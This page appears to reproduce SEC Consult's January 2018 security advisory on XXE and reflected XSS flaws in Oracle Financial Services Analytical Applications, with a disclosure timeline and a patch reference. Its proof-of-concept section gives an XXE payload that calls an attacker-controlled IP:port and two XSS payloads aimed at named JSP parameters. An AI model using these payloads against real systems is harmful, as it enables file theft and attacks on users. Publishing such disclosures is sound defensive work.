what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Oracle Financial Services Analytical Applications 7.3.5.x / 8.0.x XXE Injection / XSS

Oracle Financial Services Analytical Applications 7.3.5.x / 8.0.x XXE Injection / XSS
Posted Jan 24, 2018
Authored by Samandeep Singh, Mohammad Shah Bin Mohammad Esa | Site sec-consult.com

Oracle Financial Services Analytical Applications versions 7.3.5.x and 8.0.x suffer from XML external entity injection and cross site scripting vulnerabilities.

tags | exploit, vulnerability, xss, xxe
advisories | CVE-2018-2660, CVE-2018-2661
SHA-256 | 596ba7a1bde4935da9df89c58e1d05d2e8ba24cba2ef3cb2156029511e53d6b4

Oracle Financial Services Analytical Applications 7.3.5.x / 8.0.x XXE Injection / XSS

Change Mirror Download
SEC Consult Vulnerability Lab Security Advisory < 20180123-0 >
=======================================================================
title: XXE & Reflected XSS
product: Oracle Financial Services Analytical Applications
vulnerable version: 7.3.5.x, 8.0.x
fixed version: Oracle CPU January 2018
CVE number: CVE-2018-2660, CVE-2018-2661
impact: High
homepage: http://www.oracle.com/us/products/applications/
financial-services/analytical-applications/index.html
found: 2017-06-15
by: Mohammad Shah Bin Mohammad Esa, Samandeep Singh
(Office Singapore)
SEC Consult Vulnerability Lab

An integrated part of SEC Consult
Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich

https://www.sec-consult.com

=======================================================================

Vendor description:
-------------------
"Oracle is the unchallenged leader in Financial Services, with an
integrated, best-in-class, end-to-end solution of intelligent software
and powerful hardware designed to meet every financial service need."

Source: http://www.oracle.com/us/products/applications/
financial-services/analytical-applications/index.html


Business recommendation:
------------------------
By exploiting the XXE vulnerability, an attacker can get read access to the
filesystem of the user's system using the OFSAA web application and thus obtain
sensitive information from the system. It is also possible to bypass input
validation checks in order to inject JavaScript code.

SEC Consult recommends to immediately install the patched version.
Furthermore, a thorough security review should be performed by security
professionals to identify potential further security issues.


Vulnerability overview/description:
-----------------------------------
1) XML eXternal Entity (XXE) Injection (CVE-2018-2660)
The web application allows users to import XML files. An attacker can import a
specially crafted XML file and exploit the XXE vulnerability within the application.

2) Reflected Cross Site Scripting (CVE-2018-2661)
This vulnerability allows an unauthenticated user to inject malicious client
side script which will be executed in the browser of a user if he visits
the manipulated URL.


Proof of concept:
-----------------
1) XML External Entity Injection (XXE) (CVE-2018-2660)
For example, by importing the following XML code in the "Business Model Upload"
function a connection request from the server to the attacker's system will be made.

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "http://[IP:port]/" >]><foo>&xxe;</foo>

IP:port = IP address and port where the attacker is listening for connections

Furthermore some files can be exfiltrated to remote servers via the
techniques described in:

https://media.blackhat.com/eu-13/briefings/Osipov/bh-eu-13-XML-data-osipov-wp.pdf
http://vsecurity.com/download/papers/XMLDTDEntityAttacks.pdf


2) Reflected Cross Site Scripting (CVE-2018-2661)
The following parameters have been found to be vulnerable to
reflected cross site scripting attacks. Furthermore, there are many more
vulnerable parameters.

The following payload shows a simple alert message box:
URL : http://$DOMAIN/OFSAA/admin/PopupAlert_H5.jsp?winTitle=
METHOD : GET
PAYLOAD :
winTitle=a%3C/title%3E%3Cimg%0A%20src=x%20onerror=%22prompt%0A%28%27SEC%20consult%20-%20XSS%27%29%22%3E

URL : http://$DOMAIN/OFSAA/fsapps/common/MM_PageOpener_crossBrowser.jsp?
url=fetchErrorMessages.action&infodom=OCBCOFSAASG&formCode=summarypage&errorMessage={62}~
METHOD : GET
PAYLOAD : errorMessage={62}~%27;alert%0a(0);//&aType=DeleteConfirm


Vulnerable / tested versions:
-----------------------------
The following version has been tested which was the most recent one when
the vulnerabilities were discovered:

* Oracle Financial Services Analytical Applications 8.0.4.0.0

According to Oracle all versions 7.3.5.x and 8.0.x are affected before CPU
January 2018.


Vendor contact timeline:
------------------------
2017-09-11: Contacting vendor through encrypted email (secalert_us@oracle.com)
2017-09-20: Vendor requested to postpone the release date
2018-01-13: Vendor informed that Critical Patch Update that includes fixes
of reported issues will be released on 2018-01-16.
CVE-2018-2660 & CVE-2018-2661 were assigned for the issues
2018-01-23: Public disclosure of advisory


Solution:
---------
Apply patch update in the January 2018 Critical Patch Update:
http://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html


Workaround:
-----------
None


Advisory URL:
-------------
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult
Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://www.sec-consult.com/en/career/index.html

Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://www.sec-consult.com/en/contact/index.html
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult

EOF M. Shah / @2018

Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close